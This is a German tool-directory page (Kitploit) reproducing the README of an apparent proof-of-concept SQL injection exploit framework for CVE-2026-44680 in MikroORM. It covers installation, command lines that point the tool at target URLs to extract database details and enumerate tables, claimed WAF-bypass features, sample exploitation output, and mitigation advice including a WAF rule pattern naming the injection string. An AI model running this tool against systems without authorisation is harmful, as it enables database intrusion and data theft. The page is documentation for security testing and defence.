Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — PoC-Tool für CVE-2026-44680, das MikroORM ≤7.0.13 betrifft. Nutzt JSON-Pfad-Injection aus, um Datenbankinhalte über UNION-basierte Angriffe zu extrahieren. Bietet Schwachstellenerkennung, automatisierte Datenextraktion, Tabellenaufzählung und Unterstützung für Blind Injection. Enthält Proxy-Integration für Burp Suite sowie WAF-Umgehungstechniken. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
Penetrationstest-FrameworksSchwachstellenscannerCode-AnalyseExploitationWebsicherheitDatenbanksicherheit
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

Repository anzeigen
120vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

PoC-Tool für CVE-2026-44680, das MikroORM ≤7.0.13 betrifft. Nutzt JSON-Pfad-Injection aus, um Datenbankinhalte über UNION-basierte Angriffe zu extrahieren. Bietet Schwachstellenerkennung, automatisierte Datenextraktion, Tabellenaufzählung und Unterstützung für Blind Injection. Enthält Proxy-Integration für Burp Suite sowie WAF-Umgehungstechniken.

Teilen

CVE-2026-44680 - MikroORM-SQL-Injection-Exploit-Framework

Python Version License Status CVSS

Professionelles Proof-of-Concept-Tool für Sicherheitsforscher


🔍 Übersicht

CVE-2026-44680 ist eine kritische SQL-Injection-Schwachstelle, die MikroORM betrifft, ein beliebtes TypeScript-ORM für Node.js. Dieses Exploit-Framework bietet Sicherheitsforschern und Penetrationstestern ein professionelles Werkzeug, um die Schwachstelle zu erkennen und auszunutzen.

Autor: Sudeepa Wanigarathna
Version: 1.0.0
Klassifizierung: Professionelles Sicherheitsforschungs-Tool


🚨 Details zur Schwachstelle

AttributWert
CVE-IDCVE-2026-44680
CVSS-Score7.6 (Hoch)
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche PrivilegienNiedrig

Betroffene Versionen

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

Grundursache

MikroORM maskiert zur Laufzeit kontrollierte JSON-Pfad-Schlüssel beim Erstellen von JSON_EXTRACT-Abfragen nicht ordnungsgemäß. Angreifer können aus dem JSON-Pfad-Kontext ausbrechen und beliebigen SQL-Code einschleusen.


✨ Funktionen

FunktionBeschreibungStatus
SchwachstellenerkennungZeit- und fehlerbasierte Erkennung✅
DatenbankextraktionVersion, Datenbank, Benutzer, Hostname✅
TabellenauflistungAutomatische Ermittlung aller Tabellen✅
UNION-basierte InjektionDaten über UNION SELECT extrahieren✅
Blind InjectionBoolesche Zeichenextraktion✅
Proxy-UnterstützungBurp Suite / Abfang-Proxy✅
BerichtserstellungProfessionelle TXT-Berichte✅
WAF-UmgehungFortschrittliche Verschleierungstechniken✅

📦 Installation

Voraussetzungen

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

Installationsschritte

Schritt 1: Repository klonen

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

Schritt 2: Abhängigkeiten installieren

root@kitploit:~
# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

Schritt 3: Installation überprüfen

root@kitploit:~
python exploit.py --help

requirements.txt

root@kitploit:~
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 Schnellstart

Grundlegende Verwendung

root@kitploit:~
# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 Bedienungsanleitung

Befehlsoptionen

FlagBeschreibungStandard
-u, --urlZiel-URL (erforderlich)-
-e, --endpointAPI-Endpunkt/api/users/search
-p, --proxyHTTP-ProxyKeiner
-v, --verboseAusführliche AusgabeFalse
--detectNur Schwachstelle erkennenFalse
--extractDatenbankinformationen extrahierenFalse
--enumerateTabellen auflistenFalse
--blindBlind-Injection-ModusFalse

Beispielbefehle

1. Vollständige Ausnutzung

root@kitploit:~
python exploit.py -u http://192.168.1.100:3000

2. Benutzerdefinierter Endpunkt

root@kitploit:~
python exploit.py -u http://target.com -e /api/v2/users/query

3. Mit Proxy (Burp Suite)

root@kitploit:~
python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. Ausführliches Debugging

root@kitploit:~
python exploit.py -u http://target.com -v --extract

5. Blind Injection

root@kitploit:~
python exploit.py -u http://target.com --blind

6. Nur Erkennung

root@kitploit:~
python exploit.py -u http://target.com --detect

7. Datenbankinformationen extrahieren

root@kitploit:~
python exploit.py -u http://target.com --extract

8. Tabellen auflisten

root@kitploit:~
python exploit.py -u http://target.com --enumerate

📊 Ausgabebeispiele

Konsolenausgabe

root@kitploit:~
============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

Generierte Dateien

root@kitploit:~
exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ Gegenmaßnahmen

Sofortmaßnahmen

1. MikroORM aktualisieren

root@kitploit:~
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. Eingabevalidierung

root@kitploit:~
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. WAF-Regeln

root@kitploit:~
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. Datenbank-Härtung

  • Prinzip der geringsten Rechte anwenden
  • Separate Datenbankbenutzer verwenden
  • Abfrageprotokollierung implementieren
  • SQL-Injection-Erkennung aktivieren

⚠️ Haftungsausschluss

WICHTIG: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.

Rechtlicher Hinweis

  • ✅ Sie benötigen eine ausdrückliche Genehmigung, bevor Sie ein System testen
  • ✅ Sie sind für Schäden verantwortlich, die durch Missbrauch verursacht werden
  • ✅ Handeln Sie ethisch und melden Sie Schwachstellen verantwortungsvoll

Richtlinien für die ethische Nutzung

  1. Autorisierung: Holen Sie eine schriftliche Genehmigung vom Eigentümer des Systems ein
  2. Meldung: Melden Sie Erkenntnisse verantwortungsvoll an betroffene Hersteller
  3. Vertraulichkeit: Geben Sie Schwachstellen erst nach der Behebung preis
  4. Grenzen: Bleiben Sie im Rahmen des autorisierten Tests

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

📚 Referenzen

  • Details zu CVE-2026-44680
  • MikroORM-Sicherheitshinweis
  • OWASP SQL-Injection-Prävention

Mit ❤️ für die Sicherheitsforschungs-Community erstellt

Fehler melden • Feature anfordern • Auf GitHub mit Stern markieren

Tool herunterladen